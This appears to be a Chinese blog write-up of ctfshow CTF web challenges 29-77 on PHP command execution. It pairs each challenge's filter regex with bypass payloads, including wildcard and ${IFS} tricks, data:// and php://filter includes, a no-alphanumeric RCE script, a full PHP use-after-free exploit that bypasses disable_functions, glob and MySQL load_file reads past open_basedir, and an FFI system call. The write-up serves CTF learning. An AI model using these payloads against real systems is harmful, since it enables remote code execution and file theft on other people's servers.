当前位置: 首页 > news >正文

ctfshow web入门 命令执行(29-77)

Web 命令执行是指攻击者借助Web应用程序里的漏洞,在服务器端执行任意系统命令的一种攻击手段。

原理:

Web 应用程序在处理用户输入时,有时会调用系统命令。若开发人员没有对用户输入进行严格的过滤与验证,攻击者就能够通过构造恶意输入,注入恶意命令,让服务器执行这些命令。

看例题

Web 29

由题目可知:flag被过滤,我们可以猜测flag就在这里,我们尝试使用*来解决这个问题

1.(过滤特定字符串【例如flag】的情况:)

当我们要读取flag时,遇到过滤了flag关键词的时候,我们可以使用通配符绕过。

通配符我们只需要掌握两个符号,分别是 * 和 ?

* 号表示任意长度字符,最常见的就是一条命令处理多个文件

url/?c=system("tac fla*");

2.利用参数输入+eval

?c=eval($_GET[1]);&1=phpinfo();

?c=eval($_GET[1]);&1=system("ls");

?c=eval($_GET[1]);&1=system("tac fla?.php");

3.利用参数+include(在读取前对内容进行过滤)

(参考y4tacker师傅的解法:https://blog.csdn.net/solitudi/article/details/109837640)

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

生成的内容再进行base64解码

4.利用cp命令将flag拷贝到别处

?c=system("cp fl?g.php a.txt");

再访问a.txt

Web 30

由题目可知:

(!preg_match("/flag|system|php/i"$c))

https://blog.csdn.net/weixin_39934520/article/details/109231480,查看eval与其他函数对比

system被过滤了,可以使用passthru

?c=passthru("tac fla*");

Web 31

由题目可知:

(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i"$c))

?c=eval($_GET[1]);&1=system("tac fla?.php");

Web 32

由题目可知:

(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i"$c))

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

生成的内容再进行base64解码

Web 33

由题目可知:

(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i"$c))

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

生成的内容再进行base64解码

提示:

c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

 

Web 34

由题目可知:

(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i"$c))

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

生成的内容再进行base64解码

Web 35

由题目可知:

(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i"$c))

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

生成的内容再进行base64解码

Web 36

由题目可知:

(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i"$c))

0-9被过滤了,换成字母

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

生成的内容再进行base64解码

Web 37

题目可知:

if(!preg_match("/flag/i"$c)){

        include($c);

        echo $flag;

    

    }

提示:

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

查看源代码 或者通过包含日志文件拿shell

 

使用data协议

?c=data://text/plain/,<?php system('tac f*')?>

data协议

data://协议_data协议-CSDN博客

PHP: data:// - Manual 官方文档

data伪协议生成一段数据流,如果有 include(),include会把数据流当成代码进行执行(使用前提:allow_url_include=On)

Web 38

题目可知:

if(!preg_match("/flag|php|file/i"$c)){

        include($c);

        echo $flag;

    

    }

提示:

nginx的日志文件/var/log/nginx/access.log

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

查看源代码 或者通过包含日志文件拿shell

 

data协议

?c=data://text/plain/,<?= system('tac f*')?>

php被过滤

<?=短标签相当于<?php echo(使用前提short_open_tag=On

Web 39

由题目可知:

if(!preg_match("/flag/i"$c)){

        include($c.".php");

    }

data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用(不要被.php忽悠到)

?c=data://text/plain,<?php system("tac fla*")?>

Web 40

由题目可知:

$c $_GET['c'];

    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\|\|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i"$c)){

        eval($c);

    }

数字和符号都被过滤了???

提示:

show_source(next(array_reverse(scandir(pos(localeconv()))))); GXYCTF的禁止套娃 通过cookie获得参数进行命令执行

c=session_start();system(session_id());
passid=ls

  1. ?c=data://text/plain,<?php system("tac fla*")?>

被禁用的()是中文括号,无影响

 

  1. ?c=eval(array_pop(next(get_defined_vars())));

post传1=system("tac flag.php");

参考 RCE(远程代码执行漏洞)函数&命令&绕过总结 - 星海河 - 博客园

  1. ?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

  1. ?c=show_source(next(array_reverse(scandir(getcwd()))));

 getcwd()函数返回当前工作目录,可以替代pos(localconv())

 pos()输出数组的第一个元素,不改变指针

 current()函数返回数组中的当前元素,默认为第一个值,和pos一样

 scandir()函数返回执行目录中的文件和目录的数组。这里的参数为"."遍历当前目录

 array_reverse()数组逆置

 show_source()显示源码

Web 41

由题目可知:

if(isset($_POST['c'])){

    $c $_POST['c'];

if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'$c)){

        eval("echo($c);");

    }

 

无字母数字RCE(通过特殊字符构造字母实现代码执行

参考文章 ctfshow web入门 web41_ctfshow web41-CSDN博客

参考文章 ctfshow-web入门-命令执行(web41_exp与分析)_ctfshow web41-CSDN博客

import re # 用于处理正则表达式# 定义给定的正则表达式模式preg = '[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-'# 初始化内容字符串content = ''# 循环遍历ASCII码表中的所有字符对for i in range(256):for j in range(256):# 如果字符i和j不匹配给定的正则表达式模式if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)): # re.I表示忽略大小写# 将字符i和j进行按位或运算,得到新的字符kk = i | j# 如果字符k是ASCII可见字符(范围在32到126之间)if k >= 32 and k <= 126:# 将字符i和j转换为十六进制形式,并拼接成url编码a = '%' + hex(i)[2:].zfill(2)b = '%' + hex(j)[2:].zfill(2)# 将k对应的字符和i、j转换拼接结果写入txt文件content += (chr(k) + ' '+ a + ' ' + b + '\n')# 打开名为'rce_or.txt'的文件,以写入模式打开,如果文件不存在则创建f = open('rce_or.txt', 'w')# 将生成的内容写入文件f.write(content)# 关闭文件f.close()

由于SSL证书问题报错,在第二个脚本在My6n师傅的基础上加入了try-catch块

​
​
# -*- coding:utf-8 -*-import requests  # 用于发送HTTP请求import urllib  # 用于URL编码和解码from sys import *import os  # 用于与操作系统进行交互if (len(argv) != 2):  # 检查参数数量print("=" * 50)print('USER :python exp.py <url>')print("eg:   python exp.py http://ctfshow/")print("=" * 50)exit(0)url = argv[1]def action(arg):s1 = ""s2 = ""for i in arg:f = open("rce_or.txt", "r")while True:t = f.readline()if t == "":breakif t[0] == i:# print(i)s1 += t[2:5]s2 += t[6:9]breakf.close()output = "(\"" + s1 + "\"|\"" + s2 + "\")"return outputwhile True:param = action(input("\n[+] your function: ")) + action(input("[+] your command: "))data = {'c': urllib.parse.unquote(param)}try:r = requests.post(url, data=data, verify=False)print("\n[*] result:\n" + r.text)except requests.exceptions.RequestException as e:print(f"请求出错: {e}")​​

try - except块:

在try块中,使用requests.post方法向目标url发送 POST 请求,携带data数据。这里设置verify=False,表示在请求时不验证服务器的 SSL 证书。这是因为在原报错中,是由于证书验证失败导致请求无法正常进行,设置verify=False就跳过了这一验证步骤。然后打印服务器返回的响应内容。

在except块中,捕获requests.exceptions.RequestException异常,这是requests库中所有请求相关异常的基类。如果请求过程中出现任何问题(例如网络连接问题、服务器无响应等),就会执行这部分代码,打印出具体的错误信息。

Web 42

由题目可知:

system($c." >/dev/null 2>&1");

 

>/dev/null 2>&1 的含义

这部分是 shell 命令的一部分,用来控制命令的输出:

  • >/dev/null:将命令的标准输出(STDOUT)重定向到 /dev/null,这是一个特殊的设备文件,写入它的内容将会被丢弃,相当于将输出静默化,不会显示在终端或页面上。
  • 2>&1:将命令的标准错误输出(STDERR)重定向到标准输出(STDOUT)。这样做的目的是,即使命令产生了错误信息,也会被一同重定向到 /dev/null,不会显示在页面上。

?c=cat flag.php||ls

 

Web 43

由题目可知:

if(!preg_match("/\;|cat/i"$c)){

        system($c." >/dev/null 2>&1");

    }

与42比较,多了一个过滤

?c=tac flag.php||ls

Web 44

由题目可知:

if(!preg_match("/;|cat|flag/i"$c)){

        system($c." >/dev/null 2>&1");

    }

?c=tac fla*||ls

Web 45

由题目可知:

if(!preg_match("/\;|cat|flag| /i"$c)){

        system($c." >/dev/null 2>&1");

    }

空格被过滤了,${IFS}

?c=tac${IFS}fla*||ls

Web 46

由题目可知:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i"$c)){

        system($c." >/dev/null 2>&1");

    }

$*和数字都被过滤了

?c=tac<fla''g.php||ls(两个单引号‘

?c=tac<>fla''g.php||ls

?c=tac%09fla''g.php||ls

?c=tac%09fl?g.php||ls

?c=tac<fl?g.php||ls

?c=tac<>fl?g.php||ls

Web 47

由题目可知:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i"$c)){

        system($c." >/dev/null 2>&1");

    }

?c=tac<fla''g.php||

?c=tac%09fla?.php||

 

Web 48

由题目可知:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i"$c)){

        system($c." >/dev/null 2>&1");

    }

?c=tac<fla''g.php||

?c=tac%09fla?.php||

Web 49

由题目可知:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i"$c)){

        system($c." >/dev/null 2>&1");

    }

?c=tac<fla''g.php||

Web 50

由题目可知:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i"$c)){

        system($c." >/dev/null 2>&1");

    }

 

?c=tac<fla''g.php||

 

Web 51

由题目可知:

if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i"$c)){

        system($c." >/dev/null 2>&1");

    }

 

tac也被过滤了???

?c=t''ac<fla''g.php||

Web 52

由题目可知:

if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i"$c)){

        system($c." >/dev/null 2>&1");

    }

 

<>也被过滤了,但是$恢复

?c=t''ac${IFS}fla?.php||

发现flag并不在flag.php中

?c=ls${IFS}/||

发现flag

?c=t''ac${IFS}/fla?||

?c=nl$IFS/fla''g||

参考文章 0018. shell命令--nl_shell nl-CSDN博客

1. 显示指定文件内容及行号信息

nl /root/.bashrc

2. 显示指定文件内容及行号信息,空行也加上行号

nl -b a /root/.bashrc

3. 空行也算一行,并且行号前面自动补0,统一输出格式后显示指定文件内容及行号信息

nl -b a -n rz /root/.bashrc

4. 设置行号字段的宽度为 N 个字符,并右对齐

nl -n rz -w 2 /root/.bashrc

nl -n rz -w 5 /root/.bashrc

5. 为非空行添加行号,并设置开始行号为 100

nl -b t -v 100 /root/.bashrc

6. 使用自定义的分隔符(如顿号)添加行号

nl -s '' /root/.bashrc

7. 与其它符号或命令结合使用

nl /etc/ssh/sshd_config | less

grep "$PS1" /etc/bashrc

nl /etc/bashrc | grep "$PS1"

Web 53

由题目可知:

$c=$_GET['c'];

    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i"$c)){

        echo($c);

        $d system($c);

        echo "<br>".$d;

    }else{

        echo 'no';

    }

?c=c''at${IFS}fla?.php

Web 54

由题目可知:

if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i"$c)){

        system($c);

    }

.*c.*a.*t.* 匹配任何包含cat的字符串

ls还存在,可以看到flag在flag.php中

参考 ctf.show

把全路径写出来,如/bin/ca?,与/bin/ca?匹配的,只有/bin/cat命令,这样就用到了cat 命令了。

?c=/bin/?at${IFS}f???????

查看源码得到flag

Web 55

无字母RCE5

由题目可知:

if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i"$c)){

        system($c);

    }

字母又被过滤了???

%也被过滤了…..

构造一个post数据上传包?

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>POST数据包POC</title>

</head>

<body>

<form action="http://b3df1a2e-05d1-4146-93b5-a2e7a507deb5.challenge.ctf.show/" method="post" enctype="multipart/form-data">

<!--链接是当前打开的题目链接-->

    <label for="file">文件名:</label>

    <input type="file" name="file" id="file"><br>

    <input type="submit" name="submit" value="提交">

</form>

</body>

</html>

抓包,传参数

参考文章

无字母数字的命令执行(ctfshow web入门 55)_ctfshowweb55-CSDN博客

Web 56

由题目可知:

if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i"$c)){

        system($c);

    }

和web55一样

参考文章

无字母数字的命令执行(ctfshow web入门 56)_ctfshow56-CSDN博客

Web 57

由题目可知:

//flag in 36.php

if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i"$c)){

        system("cat ".$c.".php");

    }

设一个非零整数为n,其取反后的结果为~n,在以k位二进制补码表示的整数范围内(有符号整数),~n=-(n+1)

?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

查看网页源代码,得到flag

Web 58

由题目可知:

// 你们在炫技吗?

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}else{

    highlight_file(__FILE__);

}

 

发现题目对于system 等函数都过滤了

 

c=highlight_file("flag.php");

c=show_source("flag.php");

highlight_file() 函数的作用是将指定文件的源代码以语法高亮的HTML的格式输出

show_source()函数的作用也是将指定文件的源代码以语法高亮的HTML的格式输出

两个函数的作用基本相同

 

 

Web 59

由题目可知:

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}

c=highlight_file("flag.php");

c=show_source("flag.php");

Web 60

由题目可知:

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}

c=highlight_file("flag.php");

c=show_source("flag.php");

Web 61

由题目可知:

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}

c=highlight_file("flag.php");

c=show_source("flag.php");

 

Web 62

由题目可知:

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}

c=highlight_file("flag.php");

c=show_source("flag.php");

Web 63

由题目可知:

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}

c=highlight_file("flag.php");

c=show_source("flag.php");

Web 64

由题目可知:

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}

c=highlight_file("flag.php");

c=show_source("flag.php");

Web 65

由题目可知:

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}

c=highlight_file("flag.php");

c=show_source("flag.php");

Web 66

由题目可知:

if(isset($_POST['c'])){

        $c$_POST['c'];

        eval($c);

}

c=highlight_file("flag.php");

$flag="秀秀得了,这次不在这里";

哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈,上面几个都是一样的(58-65

c=print_r(scandir("/"));

发现有flag.txt

c=highlight_file("/flag.txt");

 scandir("/"):指定对"/"根目录进行扫描

 print_r():以可读的格式输出变量

Web 68

由题目可知:

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19

highlight_file这次也被禁用了

c=include("/flag.txt");

c=var_dump(scandir("/"));

c=readgzfile("/flag.txt");

Web 69

由题目可知:

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19

c=include("/flag.txt");

 var_dump()被过滤了

Web 70

由题目可知:

Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14

Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15

Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 21

你要上天吗?

c=var_export(scandir("/"));

c=include("/flag.txt");

Web 71

由题目可知:

给了一个index.php

// 你们在炫技吗?

if(isset($_POST['c'])){

        $c= $_POST['c'];

        eval($c);

        $s = ob_get_contents();

        ob_end_clean();

        echo preg_replace("/[0-9]|[a-z]/i","?",$s);

}

 

 ob_get_contents():该函数会返回当前输出缓冲区的内容,但不会清空缓冲区

 ob_end_clean():该函数会清空当前输出缓冲区中的内容,然后关闭缓冲区。这意味着之前存储在缓冲区的内容不会再被发送到浏览器

 

提示:

我们可以执行php代码让后面的匹配缓冲区不执行直接退出 payload:c=include('/flag.txt');exit(0);

c=var_export(scandir("/"));exit(0);

c=include('/flag.txt');exit(0);

Web 72

由题目可知:

给了一个index.php

// 你们在炫技吗?

if(isset($_POST['c'])){

        $c= $_POST['c'];

        eval($c);

        $s = ob_get_contents();

        ob_end_clean();

        echo preg_replace("/[0-9]|[a-z]/i","?",$s);

}

 var_export()被过滤了

 

尝试读取目录的时候发现开启了basedir限制,绕过尝试使用glob协议

 

c=$a="glob:///*.txt";

    if($b=opendir($a)){

        while(($file=readdir($b)) !== false){

            echo "filename:".$file."\n";

        }

        closedir($b);

    }

exit();

发现只有一个flag0.txt

粘贴脚本,url编码

c=function ctfshow($cmd) { global $abc, $helper, $backtrace;class Vuln {public $a;public function __destruct() {global $backtrace;unset($this->a);$backtrace = (new Exception)->getTrace();if(!isset($backtrace[1]['args'])) {$backtrace = debug_backtrace();}}
}class Helper {public $a, $b, $c, $d;
}function str2ptr(&$str, $p = 0, $s = 8) {$address = 0;for($j = $s-1; $j >= 0; $j--) {$address <<= 8;$address |= ord($str[$p+$j]);}return $address;
}function ptr2str($ptr, $m = 8) {$out = "";for ($i=0; $i < $m; $i++) {$out .= sprintf("%c",($ptr & 0xff));$ptr >>= 8;}return $out;
}function write(&$str, $p, $v, $n = 8) {$i = 0;for($i = 0; $i < $n; $i++) {$str[$p + $i] = sprintf("%c",($v & 0xff));$v >>= 8;}
}function leak($addr, $p = 0, $s = 8) {global $abc, $helper;write($abc, 0x68, $addr + $p - 0x10);$leak = strlen($helper->a);if($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak;
}function parse_elf($base) {$e_type = leak($base, 0x10, 2);$e_phoff = leak($base, 0x20);$e_phentsize = leak($base, 0x36, 2);$e_phnum = leak($base, 0x38, 2);for($i = 0; $i < $e_phnum; $i++) {$header = $base + $e_phoff + $i * $e_phentsize;$p_type  = leak($header, 0, 4);$p_flags = leak($header, 4, 4);$p_vaddr = leak($header, 0x10);$p_memsz = leak($header, 0x28);if($p_type == 1 && $p_flags == 6) {$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;$data_size = $p_memsz;} else if($p_type == 1 && $p_flags == 5) {$text_size = $p_memsz;}}if(!$data_addr || !$text_size || !$data_size)return false;return [$data_addr, $text_size, $data_size];
}function get_basic_funcs($base, $elf) {list($data_addr, $text_size, $data_size) = $elf;for($i = 0; $i < $data_size / 8; $i++) {$leak = leak($data_addr, $i * 8);if($leak - $base > 0 && $leak - $base < $data_addr - $base) {$deref = leak($leak);if($deref != 0x746e6174736e6f63)continue;} else continue;$leak = leak($data_addr, ($i + 4) * 8);if($leak - $base > 0 && $leak - $base < $data_addr - $base) {$deref = leak($leak);if($deref != 0x786568326e6962)continue;} else continue;return $data_addr + $i * 8;}
}function get_binary_base($binary_leak) {$base = 0;$start = $binary_leak & 0xfffffffffffff000;for($i = 0; $i < 0x1000; $i++) {$addr = $start - 0x1000 * $i;$leak = leak($addr, 0, 7);if($leak == 0x10102464c457f) {return $addr;}}
}function get_system($basic_funcs) {$addr = $basic_funcs;do {$f_entry = leak($addr);$f_name = leak($f_entry, 0, 6);if($f_name == 0x6d6574737973) {return leak($addr + 8);}$addr += 0x20;} while($f_entry != 0);return false;
}function trigger_uaf($arg) {$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');$vuln = new Vuln();$vuln->a = $arg;
}if(stristr(PHP_OS, 'WIN')) {die('This PoC is for *nix systems only.');
}$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');trigger_uaf('x');
$abc = $backtrace[1]['args'][0];$helper = new Helper;
$helper->b = function ($x) { };if(strlen($abc) == 79 || strlen($abc) == 0) {die("UAF failed");
}$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;write($abc, 0x60, 2);
write($abc, 0x70, 6);write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);$closure_obj = str2ptr($abc, 0x20);$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {die("Couldn't determine binary base address");
}if(!($elf = parse_elf($base))) {die("Couldn't parse ELF header");
}if(!($basic_funcs = get_basic_funcs($base, $elf))) {die("Couldn't get basic_functions address");
}if(!($zif_system = get_system($basic_funcs))) {die("Couldn't get zif_system address");
}$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);($helper->b)($cmd);
exit();}ctfshow("cat /flag0.txt");ob_end_flush(); ?>

原理:利用php垃圾回收,回收漏洞实现绕过basedir

具体看b站ctfshow的web72讲解

Web 73

由题目可知:

c=var_export(scandir("/"));exit(0);

发现有一个flagc.txt

c=include("/flagc.txt");exit(0);

Web 74

由题目可知:

c=var_export(scandir("/"));exit(0);

显示NULL??

但是print_r和var_dump还是被过滤的状态

c=var_export(glob('../../..'.'/*'));exit();

golb:// 用于查找匹配文件路径模式的php伪协议

. 在php中属于字符串连接运算符,在这里将'../../..'和'/*'连接起来形成新的字符串

../../..  表示当前所在目录向上三级的目录

/*  是通配符,意味着该目录下的所有文件以及文件夹

c=include("/flagx.txt");exit();

Web 75

由题目可知:

c=var_export(glob('../../..'.'/*'));exit(0);显示false

ctfshow-web入门-命令执行(web71-web74)_web72-CSDN博客

ctfshow-web入门-命令执行(web75-web77)_ctfshow web75-CSDN博客

参考Myon5师傅的文章,(注意缩进问题

c=$a=new DirectoryIterator("glob:///*");

foreach($a as $f)

{

   echo($f->__toString().' ');

}

exit(0);

$a = new DirectoryIterator("glob:///*"); // 创建一个DirectoryIterator对象,遍历根目录

foreach ($a as $f) { // 遍历每个条目

    echo($f->__toString() . ' '); // 输出条目的名称,并添加一个空格

}

exit(0); // 终止脚本执行

使用golb协议绕过open_basedir查看根目录下文件,发现flag36.txt

c=try {

  $dbh = new PDO('mysql:host=localhost;dbname=information_schema', 'root', 'root');

  foreach($dbh->query('select load_file("/flag36.txt")') as $row) { 

      echo($row[0])."|";

  }

  $dbh = null;

} catch (PDOException $e) {

  echo $e->getMessage();

  die();

};exit();

利用 mysql load_file 读文件,提示中是从数据库 ctftraining 中查询的,就算我们不知道这个数据库名,也可以直接从默认的 information_schema 中查,该数据库包含了所有的数据库的内容。

try {

    // 使用PDOPHP Data Objects)创建一个新的数据库连接对象,指定DSN、用户名(root)和密码(root

    $dbh = new PDO('mysql:host=localhost;dbname=information_schema', 'root', 'root');

   

    // 执行一个SQL查询,从指定的文件(/flag36.txt)中读取内容

    foreach($dbh->query('select load_file("/flag36.txt")') as $row) { 

        // 输出读取到的内容,并追加一个竖线(|

        echo($row[0])."|";

    }

   

    // 将数据库连接对象设置为null,关闭连接

    $dbh = null;

} catch (PDOException $e) {

    // 如果发生PDO异常,输出错误信息

    echo $e->getMessage();

    // 终止脚本执行

    die();

}

// 终止脚本执行

exit();

$dbh 是数据库连接句柄(database handle),它是通过 new PDO 创建的,用于与数据库进行交互。

PDO(PHP Data Objects)是PHP中的一个扩展,它提供了一个统一的接口来访问不同的数据库。它支持预处理语句和事务,使数据库操作更安全和高效。

DSN(数据源名称,Data Source Name)是一个包含数据库连接信息的字符串。它通常包括数据库类型、主机名、数据库名称等信息。在创建PDO对象时指定,即 'mysql:host=localhost;dbname=information_schema'。这个字符串包含了数据库类型(mysql)、主机名(localhost)和数据库名称(information_schema)。

foreach 是PHP中的一个控制结构,用于遍历数组或对象。在上面payload中,foreach 用于遍历SQL查询的结果集(由 $dbh->query 返回),并处理每一行的数据。

Web 76

由题目可知:

c=$a=new DirectoryIterator("glob:///*");

foreach($a as $f)

{

   echo($f->__toString().' ');

}

exit(0);

查看根目录下的文件

c=try {

  $dbh = new PDO('mysql:host=localhost;dbname=information_schema', 'root', 'root');

  foreach($dbh->query('select load_file("/flag36d.txt")') as $row) { 

      echo($row[0])."|";

  }

  $dbh = null;

} catch (PDOException $e) {

  echo $e->getMessage();

  die();

};exit();

Web 77

由题目可知:

c=$a=new DirectoryIterator("glob:///*");

foreach($a as $f)

{

   echo($f->__toString().' ');

}

exit(0);

查看根目录下的文件

发现有flag36.txt和readflag

c=try {

  $dbh = new PDO('mysql:host=localhost;dbname=information_schema', 'root', 'root');

  foreach($dbh->query('select load_file("/flag36d.txt")') as $row) { 

      echo($row[0])."|";

  }

  $dbh = null;

} catch (PDOException $e) {

  echo $e->getMessage();

  die();

};exit();

could not find driver

$ffi = FFI::cdef("int system(const char *command);");//创建一个system对象

$a='/readflag > 1.txt';//没有回显的

$ffi->system($a);//通过$ffi去调用system函数

FFI::cdef 方法用于定义 C 函数原型,其中 int system(const char *command); 是 C 语言中 system  函数的声明。system 函数接受一个字符串参数(即Shell命令),并在系统的命令行中执行该命令;

之后执行 /readflag 程序并将其输出重定向到文件 1.txt;

通过 FFI 对象 $ffi 调用了前面定义的 system 函数,并传递了字符串变量 $a 作为参数。也就是说,实际执行的是 Shell 命令 /readflag > 1.txt,效果是在系统中运行 /readflag 程序,并将其输出结果保存到当前目录下的 1.txt 文件中。

ctfshow-web入门-命令执行(web75-web77)_ctfshow web75-CSDN博客

看了佬的文章,慢慢理解

相关文章:

ctfshow web入门 命令执行(29-77)

Web 命令执行是指攻击者借助Web应用程序里的漏洞&#xff0c;在服务器端执行任意系统命令的一种攻击手段。 原理&#xff1a; Web 应用程序在处理用户输入时&#xff0c;有时会调用系统命令。若开发人员没有对用户输入进行严格的过滤与验证&#xff0c;攻击者就能够通过构造恶意…...

Mac「brew」快速安装Redis

安装Redis 步骤 1&#xff1a;安装 Redis 打开终端&#xff08;Terminal&#xff09;。 运行以下命令安装 Redis&#xff1a; brew install redis步骤 2&#xff1a;启动 Redis 安装完成后&#xff0c;可以使用以下命令启动 Redis 服务&#xff1a; brew services start redis…...

非对称电容减重实验

加载高压的非对称电容在变压器油中的减重实验 早年国外流传飘升机&#xff08;Lifter&#xff09;的视频。爱好者们用简单的材料制作了非对称电容&#xff0c;通高压直流电&#xff0c;它就能飘起来。 所谓的飘升机&#xff0c;就是一种非对称电容。它由面积相差极大的两个极板…...

day37图像处理OpenCV

文章目录 一、图像预处理19 霍夫变换19.1 理解霍夫变换19.2 (标准)霍夫直线变换19.3 统计概率霍夫直线变换19.4 霍夫圆变换 一、图像预处理 19 霍夫变换 19.1 理解霍夫变换 霍夫变换是图像处理的一种技术&#xff0c;主要用于检测图像中的直线、圆等几何形状。基本思想就是将…...

23种设计模式-行为型模式之责任链模式(Java版本)

Java 责任链模式&#xff08;Chain of Responsibility Pattern&#xff09;详解 &#x1f9e0; 什么是责任链模式&#xff1f; 责任链模式是一种行为型设计模式&#xff0c;它使多个对象都有机会处理请求&#xff0c;从而避免请求的发送者与接收者之间的耦合关系。将这些对象…...

机器学习的基本概念

机器学习是人工智能的一个重要研究领域。与计算机科学、心理学等多种学科都有密切的关系&#xff0c;牵涉的面比较宽&#xff0c;而且许多理论及技术上的问题尚处于研究之中&#xff0c;接下来对它的一些基本概念和方法作一简要讨论&#xff0c;以便对它有一个初步的认识。 一…...

【6】GD32 高级通信外设 CAN、USBD

